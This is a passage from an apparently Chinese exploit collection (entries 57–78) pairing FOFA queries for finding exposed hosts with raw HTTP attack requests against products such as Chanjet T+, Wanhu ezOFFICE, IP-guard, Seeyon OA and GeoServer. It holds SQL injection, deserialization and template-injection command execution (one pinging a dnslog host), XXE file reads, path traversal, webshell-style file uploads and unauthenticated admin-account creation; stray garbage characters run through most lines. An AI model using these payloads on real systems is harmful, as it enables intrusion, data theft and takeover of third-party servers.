' |4 N* e2 {* |- L. `6 {Content-Type: application/json/ i; I! h$ x! P5 @1 f
( C9 W% W. t1 ?& w; T
{" B$ N8 K% a" H2 v- g
"storeID":{9 c- v' N4 C" _7 M* l* \0 F8 `
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
$ h" b2 s% l1 ^' V/ H "MethodName":"Start",* D) k" [& z& r0 `+ T" T
"ObjectInstance":{/ G+ Z! m1 X) Z& n9 q
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0 d. D" M$ h1 {5 \' e& f; Y
"StartInfo": {
$ i1 L' ]7 x3 g$ W5 N9 Y/ K; q "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",1 ?2 K2 w5 b8 Z' h1 M9 J( c
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"1 A8 k2 v3 f6 U! v
}# a$ }% n0 A5 b1 W. i; x
}
$ p7 x5 B/ a+ F2 ^ }
: @6 H# H& L% a8 ^; l}
# G2 ]9 N0 x$ X9 w3 C8 Q0 C
; u! ~" |; F3 E5 x0 m. h
- a0 c+ S) {' m1 M; G57. 畅捷通T+ keyEdit.aspx SQL注入
$ W& D' f4 m+ WFOFA:app="畅捷通-TPlus": M2 R: v; X/ x5 t! ?4 v
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.17 r6 K# v" y3 A4 _1 h) ~' [2 }0 B4 D5 M5 Q
Host: host( Q7 e5 u$ I1 w! P. }; F1 D- Z
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36: d3 E. e, n; u# X* n; ?
Accept-Charset: utf-8
* R& H4 f y/ S: K* @$ n, q+ v/ oAccept-Encoding: gzip, deflate5 Z2 z. G7 V$ T1 y4 B) x
Connection: close4 N" j& f1 m g, A G
B$ s+ U* z& H% y
6 V: _: u. g! n7 P2 {+ O, O0 @2 @
58. 畅捷通T+ KeyInfoList.aspx sql注入
9 w% r! J! d* u- @' n+ N: I0 t( y1 G% [) ZFOFA:app="畅捷通-TPlus"
/ q; h. J+ H5 r0 ?GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1 C% p3 h% }! J' R+ z5 i
Host: your-ip% `8 v3 N" Z; |& h1 W
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36) c2 X* p: z [/ c* B, h3 }
Accept-Charset: utf-8
& `# w) r" K" e( Y0 f( \% jAccept-Encoding: gzip, deflate7 g8 E. z( @* ^/ i9 Z# U6 g8 w, v. K
Connection: close; n1 R+ i% \; }6 r1 }: A0 o0 T; G& Y
+ H# O: W2 }, `. \5 V
& X$ P4 W5 ?2 }" x1 Q59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
! i/ _0 p0 G8 d+ e/ r6 iFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"* ~ P4 `" W5 J7 {* _( l2 j1 i
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
+ H- r2 F8 D0 i+ T+ bHost: 192.168.86.128:90907 s2 m# U. y. y- E
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.361 s4 s. O; s9 i' u- s3 p
Connection: close- N( f. ]9 r g
Content-Length: 1669
: a* g% T5 e# {3 iAccept: */*/ V( V- o) ]0 G% U2 T% L
Accept-Language: en
) E' ~$ E8 c) |! R) Q* Z" X8 R+ cContent-Type: application/x-www-form-urlencoded
, m# P( M @( m+ O* g6 h3 Z# j4 pAccept-Encoding: gzip6 i r3 p- ?. N" z x$ F7 ~
5 N' R2 K m# B& J9 d) LPAYLOAD
* [+ p+ {' q: g# ^
! C# w) Y- U* P! f6 t$ M/ C
, r- I& G( m/ R( D0 W60. 百卓Smart管理平台 importexport.php SQL注入
/ C! }; q( v/ F7 S! s8 v1 FFOFA:title="Smart管理平台"
- p T/ c: l5 `2 l, W" ?8 u2 JGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.10 |/ p6 b6 ?8 N& }" I
Host:" S8 e& a8 B3 y& L/ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 ^$ U& W- m" v3 P% v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 z$ d' _+ v; z- |6 x9 P# zAccept-Encoding: gzip, deflate
0 w( Q! n5 F5 k, OAccept-Language: zh-CN,zh;q=0.9: W4 j# Y+ W7 ^3 n
Connection: close
7 M# L% o& G% E2 V# I* y& H. u! }; p. T
# r3 @5 a7 B3 X$ B( }* _
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传0 Q, a+ [# M0 j4 I
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
# _$ Q2 I6 y9 U/ z& }. Y# y. R# JPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
, ?, m/ } q+ B( }: J3 i; [4 XHost: x.x.x.x0 F( X* s4 ^. V7 e" D9 s6 O8 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ k$ N# g; |- V2 J9 Z# K7 N) MConnection: close% I' T! @ R) F8 z! ^
Content-Length: 27: m7 l2 t2 e% ^4 S+ V" m3 X Q
Accept: */*$ `* R. m* m d7 L4 K& N [2 T; V
Accept-Encoding: gzip, deflate
9 r' N6 I( u! f0 y) N/ q& ?Accept-Language: en
, |, `/ [ l* r' F- x9 P! eContent-Type: application/x-www-form-urlencoded
: v* L8 ` s6 O: m7 G- i3 x: K6 G& F
- @* \& h1 ?# M( m$ M1 f$ p8uxssX66eqrqtKObcVa0kid98xa( i m3 f6 {& F& a+ ]3 u
& ]9 n* _6 h8 B4 p/ A
5 W+ s4 {; C* o0 I- c6 a) G8 j
62. IP-guard WebServer 远程命令执行
, P D8 Y1 @ O6 r6 s9 V1 `% X) wFOFA:"IP-guard" && icon_hash="2030860561"# ]( g! H2 Y% v0 ~9 `8 O, _
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.17 ?+ z+ ~1 \( X$ ~! @
Host: x.x.x.x
( s, `- g+ ]0 T/ `) h) O; bUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
/ `5 ]. d6 N, O, b4 o1 [+ sConnection: close
! y5 I9 ^. W* a- AAccept: */*# Y% k! V! s2 l* A
Accept-Language: en
/ X3 ]5 {7 l% M6 P) VAccept-Encoding: gzip U0 ~$ _& I) P
3 d5 Q' Z' x! I) Q) {
) E, u) B H* @访问9 y( N; P' p) l; z3 `
7 F+ w4 [! t/ e
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
; N3 H# K: \' x# R5 MHost: x.x.x.x8 g& d% B6 B$ y- `! U" H/ e8 T
* [5 U7 w& ?- z6 d c: G5 g0 r! g. R7 X0 D( M8 b, V
63. IP-guard WebServer任意文件读取
: {) `/ _7 f* G& O/ T* R7 @8 {IP-guard < 4.82.0609.0
$ `& X$ g9 U1 i4 F5 ~+ V0 t! m* wFOFA:icon_hash="2030860561"+ S7 {7 e7 \% q, h
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1. m8 u; p2 y' z4 V! Z
Host: your-ip
5 c( d3 i. F, W3 @- l1 V' uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 u+ W( j4 H, DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: p" h- ]% {3 H
Accept-Encoding: gzip, deflate" ]/ o1 A, v) } V. K$ J
Accept-Language: zh-CN,zh;q=0.9
! o+ ]2 J( }1 v2 JConnection: close" J' ~0 ]- m- n$ {% a m I
Content-Type: application/x-www-form-urlencoded) A0 z$ L0 [$ z- Z7 \( o
6 u8 y# [, Y" Q; n l# \
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A5 l5 g6 t9 `) f" `' h
; _6 r- R8 ?7 f7 m, f7 x7 M
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
; G) L+ y& K3 C+ ]FOFA:body="/Scripts/EnjoyMsg.js"
) Y1 ]0 }4 f: r' n# n8 gPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
/ I& l3 A; `- R+ X# `4 {Host: 192.168.86.128:9001
0 c @5 J( `# l/ GUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
3 b2 \( H! X( l9 v, ?( q& ?Connection: close2 e X- O/ A- o
Content-Length: 369! t3 c- L& Z% U/ w7 r. X: d0 U
Accept: */*
& S1 [& D/ ^& m, @* u0 zAccept-Language: en
8 j5 a/ c- @" A4 A! UContent-Type: text/xml; charset=utf-8
: B4 ?7 m7 G# OAccept-Encoding: gzip( O6 _6 o5 k5 o6 r) b) }5 V/ @
* b% }0 Q5 F. g6 T! O5 r
<?xml version="1.0" encoding="utf-8"?># e7 R6 f4 w. b3 H# Z. B
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">5 g& X# B1 z3 g1 [& d
<soap:Body>9 w& Y$ H( I- r$ ~; C; X# Q. P
<GetOSpById xmlns="http://tempuri.org/">
m- V4 {6 M4 a J% p) y. v+ ] | <sId>1';waitfor delay '0:0:5'--+</sId>
9 s9 O1 f# l, j3 _5 {5 b6 g6 G! {' Y/ \ </GetOSpById>/ d# p$ C5 n) V# B( B
</soap:Body>! S; H& ~: @- d( B
</soap:Envelope>
3 e& X. I, W: E" s$ E7 W( s
. S8 e- N* g% O- A0 T
) H+ L- S" ~, v& \0 b65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
- w9 |. p8 @0 F4 n* {, vFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
# ?) t R/ k+ y! z6 @, L1 ^响应200即成功创建账号test123456/123456
' }' Z) |9 s) D- zPOST /SystemMng.ashx HTTP/1.1
* @5 j% r5 N+ ]5 \2 \! m. OHost:" ]. D! B- v5 |
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)2 O5 ?2 ~* I1 R6 d
Accept-Encoding: gzip, deflate
) ?8 A% F& L: A' w2 KAccept: */*
; B# T' w1 Y0 k) j- v1 ]Connection: close
, S. V% v- S# c/ }% XAccept-Language: en
/ X& r5 r) G# K. D! X! i+ FContent-Length: 174. `0 p, H2 h b; Z
' Z V( m6 r, i. j S3 f6 G/ _* moperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
" a3 Q* \+ m7 ^' G6 w9 E: K# v! J; B. z
% E( n$ @# [" P3 q1 C
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
1 O! m- `, l- L0 Y& d. v# @FOFA:app="万户ezOFFICE协同管理平台"7 Y3 Z% `( _/ R3 c. @
: R' P' `) R h* _, ?9 jGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1" y3 R: g: Z" m( o
Host: x.x.x.x- \; r$ Z m, z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 _7 s2 M, Z0 a# W$ O, `8 i5 fConnection: close
5 c# u3 r, u6 f4 L! ?( |$ qAccept: */*
* J0 E0 s; j% A" o; j, k3 j0 ~Accept-Language: en- B" S8 M" _9 v; ~) \9 q
Accept-Encoding: gzip
7 T1 ` s1 s+ j! |1 s) C& A8 H/ V/ x* l( u w
# w2 h+ M! R: o! o- ]. ]
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在' k w) h" N' D4 [4 J
2 u) ?6 R5 J& l( V
67. 万户ezOFFICE wpsservlet任意文件上传
5 [8 b K7 J2 mFOFA:app="万户网络-ezOFFICE"9 l- u+ u* @! T3 b1 d# `
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
4 S4 V# l0 m. M* e/ F" V/ MPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
8 d( |: Y; F3 SHost: x.x.x.x
. ]; C- L5 L) Y6 N. K9 M( fUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0) W" X- Q: ^4 B" v( v4 V
Content-Length: 173
5 F/ ?) K& \) \6 k: v* R. t' zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.82 y8 G: h4 E. q. b
Accept-Encoding: gzip, deflate
7 I0 C9 U( o# G' M, T' xAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
m1 U. D* z# d9 zConnection: close
$ S4 @* C* s0 v$ kContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
2 S% @7 i. C! d) }8 K. ?1 w) }4 t! kDNT: 16 r- k3 L1 W- i/ |
Upgrade-Insecure-Requests: 1
: D0 r; r/ ?2 ]* @3 u8 X5 T
5 f0 ^* Z9 m' V: d+ Q4 A! T--ufuadpxathqvxfqnuyuqaozvseiueerp% B- K, L4 d: o; F
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
5 h$ y. C5 b/ \5 M v* C) E7 h9 i+ X# m2 ]) u7 O
<% out.print("sasdfghjkj");%>6 j2 P/ ^( v7 F/ E! H" X
--ufuadpxathqvxfqnuyuqaozvseiueerp--# ~& ~9 n) a: r0 d; Q, L6 m
- M- N, a8 a9 g6 Y1 J5 C
, l" Q) x5 e% v& \ o& ]. P; ]文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp% u* |- `+ R& ]
5 `( L- R6 j& h( c. l* o& {
68. 万户ezOFFICE wf_printnum.jsp SQL注入
! _- k& V) F' D/ XFOFA:app="万户ezOFFICE协同管理平台"
: z; V" m) I0 h# s4 o( w' X$ }GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1& b& f* o+ D* b$ F, }3 R' ]
Host: {{host}}4 L% ]/ P6 D, f' p8 a3 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.365 s, M% c( [/ Z5 A' p( N# e
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8" D8 x) a' o+ l$ i6 y) }
Accept-Encoding: gzip, deflate
* U, Z( G$ X# U, P; T2 p" \Accept-Language: zh-CN,zh;q=0.9! v/ Q+ K" P7 d* G/ r
Connection: close
' R0 C8 @: n( S# |% t8 g
+ Q2 S3 @2 w( Y/ h- v& g5 c" ^& S) z, G; w
69. 万户 ezOFFICE contract_gd.jsp SQL注入
/ _9 W# Z# s! M8 _" ?FOFA:app="万户ezOFFICE协同管理平台"; b% i. n2 o0 D3 W) u
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
, d1 P8 f2 d8 h7 ]4 eHost: your-ip N" {4 U2 L1 M( ^5 M
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
! X$ C. k% u5 y! QAccept-Encoding: gzip, deflate* h* p1 ]: Y L) [
Accept: */*
; z1 x2 l6 O4 D2 F- c" lConnection: keep-alive
5 C& s. e) T0 r* I9 n6 R' T
- T8 a# U4 V, W" ]; s0 H: B+ L+ k5 p3 z8 i4 q
70. 万户ezEIP success 命令执行
* D- R$ b- m( }6 G8 Z) G5 Y# l$ RFOFA:app="万户网络-ezEIP"
; y7 _7 S. h8 d: QPOST /member/success.aspx HTTP/1.1- X- i3 J" P/ t# a. a8 T4 ?
Host: {{Hostname}}. w* q! z5 B7 f- }! ]" k- j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
0 L! a% X/ V5 l4 P4 Y( `% gSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
8 \) q8 \3 I0 ]Content-Type: application/x-www-form-urlencoded' ^* B4 _# W4 J V+ J+ ^3 m2 ?
TYPE: C
; e; x) ^* P7 @5 e4 Q( nContent-Length: 16702
# T: z9 B x3 K% ^$ Y; D) v8 p/ Z! i# {4 i4 A( d+ _1 Q4 p
__VIEWSTATE=PAYLOAD
8 \9 B8 B- t$ |* ?1 d* x. e6 {6 w" `! T
7 T$ F/ s1 b8 j& H7 \+ D71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
h' T2 y u8 z! n$ k2 UFOFA:body="PM2项目管理系统BS版增强工具.zip"
7 M) r+ X1 j" h0 Q, z' j5 Q4 uGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1% c9 {, b/ x5 }$ S9 s4 I( k* M4 g
Host: x.x.x.xx.x.x.x
9 O9 B7 b) |4 e' o. H5 SUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
) T! M' }3 G8 P' e2 _& ?Connection: close9 ^# A$ Z+ x! g) M- Q0 n: \0 x1 h5 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, l' I6 r2 c7 }Accept-Encoding: gzip, deflate
( E6 |4 e1 d( j! j9 q( GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 {) I# T9 [9 d5 X2 ?Upgrade-Insecure-Requests: 1
+ f- E% b) S! s0 D/ q. \0 s6 U* x6 Z, Z# ^3 m7 B
8 [ b% T5 @2 V0 K
72. 致远OA getAjaxDataServlet XXE
0 \0 }! `( k1 ^1 tFOFA:app="致远互联-OA"
: P. J h( n& R1 N7 G3 A, vPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1( n' i5 Y% z& {
Host: 192.168.40.131:8099) u: _- y5 |1 g) E5 D
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
4 X% V" g6 V, D, J: y& ?+ Y5 pConnection: close
& a: \; ]. l$ U0 L2 B# m! XContent-Length: 583
2 z0 d) L) ^% k% UContent-Type: application/x-www-form-urlencoded6 \( Q( a% j' c7 q
Accept-Encoding: gzip5 C% o, [6 ?8 f! U# P2 U
! u* Y* G6 Z1 e5 P( V
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E( d* o% A& f; @
! W# |) ] S+ ^# C, F( c' L& `- l* ~: {* L2 @
73. GeoServer wms远程代码执行2 m5 V9 i5 w$ C" b" f* N: q
FOFA:icon_hash=”97540678”3 C$ L, U C- q
POST /geoserver/wms HTTP/1.1- G; `5 r0 @0 t9 V" Q% {! ~
Host:
7 S( h6 E1 s6 m1 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: v! A7 \. ]5 R2 m* UContent-Length: 1981+ [0 C ~2 t4 O9 N/ u: \
Accept-Encoding: gzip, deflate2 `, Y6 k) J9 E0 F# ^9 h; L
Connection: close3 E% z0 L1 ^1 J u
Content-Type: application/xml
+ v" R7 O4 |4 a' `SL-CE-SUID: 3
+ y* c+ G. h, T5 `9 [6 c2 O; `/ k: j; I% U/ r2 C2 d9 }
PAYLOAD/ a0 W: r) w# i! @# Q
- V" u4 m* H0 T, I8 c
V* ~9 c* n" z3 S7 N; k, ?; a' m* N74. 致远M3-server 6_1sp1 反序列化RCE
6 N. J4 ], X# U: m" X' D6 dFOFA:title="M3-Server"
3 s9 F( K, G' C3 e2 P& ^0 tPAYLOAD, v# s& q6 g$ ?; ?! A
/ D: ]4 ~ B* h7 ~ P
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE O3 n; E- i( K J X
FOFA:app="TELESQUARE-TLR-2005KSH": l7 d% N G8 L2 A+ A9 D/ h' w
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
- y% `: d2 ?# i* a- FHost: x.x.x.x
2 ^$ R3 U8 ]4 S( g0 y( }4 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: E6 R& o% z! b; _% ~ j
Connection: close
3 [; S( o3 n* {3 R. i* C8 TAccept: */*; J) z4 s% j3 B( b G, @
Accept-Language: en z4 f3 _6 B! {- s: n: y. C
Accept-Encoding: gzip0 r9 l P( b! g' t/ Q3 L
4 V- O; E- t2 z; n* f! [- J7 M$ V. U
, c. Y+ D. u. O+ C) d
GET /cgi-bin/test28256.txt HTTP/1.1- l( z. S3 M$ [ Z- Y
Host: x.x.x.x7 L7 I5 t/ r8 ^" I
# i3 Z4 K1 p( t4 c
# [2 ]6 b5 U3 G" D3 |76. 新开普掌上校园服务管理平台service.action远程命令执行! V+ }3 e& N; v: Q$ g- w7 m
FOFA:title="掌上校园服务管理平台"7 ]5 p& T- x$ n! J0 h& ?; X6 M
POST /service_transport/service.action HTTP/1.1/ Y; {% S" [6 W& v4 A
Host: x.x.x.x* |4 I+ u+ A: |( t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0( Q g; [, _7 P$ ^
Connection: close s6 T1 K! h3 D* W/ K
Content-Length: 2111 y, D3 p6 O8 v E$ ?# Q; V5 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) J* B2 c$ j, R! p6 h
Accept-Encoding: gzip, deflate
3 R6 w$ K5 J" B4 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' A( r( Q6 ^2 A& f( |
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
! f4 ^; J# U5 G/ p: w. N: L# pUpgrade-Insecure-Requests: 1/ @, Y2 I" C$ _+ {7 Q1 Q: d
- s) k. H& p+ K& L1 [
{
- l% i" P! m) F1 e' w1 w+ R"command": "GetFZinfo",7 y6 K: _: r2 T1 a
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
* ^# i9 N( o; \2 d$ y ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"+ H9 ]6 C3 G+ C! n- N% k) i
}* m, c/ L- o8 l5 A
) R6 }6 }9 ?- c* \( O7 w, h9 N2 V, M5 V/ k/ a& m5 ~, C1 G
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.19 Y/ H% i- z5 J. F6 B' Y
Host: x.x.x.x" Q3 r1 X8 x, A+ D
3 t8 w3 ^; d# f( {* Y. z5 p
4 C) A. Z+ p7 z6 J5 N% u: G& g
" w* a' l" q6 Z% z Q$ @77. F22服装管理软件系统UploadHandler.ashx任意文件上传( e# x1 A( T) |& o: L1 Q
FOFA:body="F22WEB登陆"6 P# S$ u9 a3 V! E. {2 D
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
- I' t" x! L+ f! u4 F+ w% mHost: x.x.x.x
( X3 O/ p: c. h: GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; X: T' y8 I: Z4 W- @$ ~* c
Connection: close% D+ C; v0 z$ y; R1 r" j' V
Content-Length: 433
% a) q+ s; d3 TAccept: */*; U7 u2 u/ J& v
Accept-Encoding: gzip, deflate. n3 n8 x: S/ p6 l9 e
Accept-Language: zh-CN,zh;q=0.9, q5 y. @5 m6 s( y
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
0 B5 W) T. k. w( h& s8 s# v; \% [/ P; i; w
------------398jnjVTTlDVXHlE7yYnfwBoix
' l% I, r+ @& K5 fContent-Disposition: form-data; name="folder"
3 V" H: a! U. N$ U
+ h1 e) m" i6 `- U& u6 _3 i/upload/udplog
; q) q8 n1 {# q3 q* k% f------------398jnjVTTlDVXHlE7yYnfwBoix' p& H) G1 ~1 w7 y# f
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
8 w- z6 r" o& o3 GContent-Type: application/octet-stream
" T+ P( @4 n* Q. T; V; q" V, L: a" s
hello1234567
9 R9 k( x6 L/ S- S6 {& K. J; ]0 v) _" V------------398jnjVTTlDVXHlE7yYnfwBoix
1 `$ U7 k/ q/ J3 UContent-Disposition: form-data; name="Upload"4 D2 |8 a9 a3 B3 i' ?
6 I. x4 y, r( }0 _Submit Query
; Y5 U% ?( B0 _1 P------------398jnjVTTlDVXHlE7yYnfwBoix--' C7 ^+ @- |# N, x
4 `4 i, U5 \8 j! }2 A
; e9 E/ e$ F( k; A) W78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
6 p6 ~' p0 s6 z$ BFOFA:icon_hash="2001627082"
7 a, E8 L, `0 c9 q1 S) GPOST /Platform/System/FileUpload.ashx HTTP/1.12 Q8 u6 t. l5 w: t2 ?/ \
Host: x.x.x.x2 l# N8 E1 V$ C1 Q C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, H! K; Q+ f% Y, S4 _' W
Connection: close' t! n9 T* b1 ^$ k% G1 p
Content-Length: 3365 x* Q% c9 i) S e3 z
Accept-Encoding: gzip
5 v$ [) N4 x3 @3 n8 mContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l6 S! X% t, z" j3 _6 b; @/ S. t0 b. i
6 t. p8 V: s5 y* @4 m. n- d0 O
------YsOxWxSvj1KyZow1PTsh98fdu6l S5 h. F. H" W) Y
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"$ \: C9 H7 }6 w6 a% M- @
Content-Type: image/png
: q F6 h* f( V1 a7 u; x: S$ I* b0 t8 {$ n/ f; N; @% t3 k
YsOxWxSvj1KyZow1PTsh98fdu6l; N, \0 v" D- j( p/ A3 B
------YsOxWxSvj1KyZow1PTsh98fdu6l
/ H) u! z2 w( N z6 A1 tContent-Disposition: form-data; name="target"& S& `4 n3 P/ ?" ~* E0 s2 R
: g7 `+ f! b! X7 \! K+ M, p4 t/Applications/SkillDevelopAndEHS/
- l% {& X& k) g! L8 r------YsOxWxSvj1KyZow1PTsh98fdu6l--
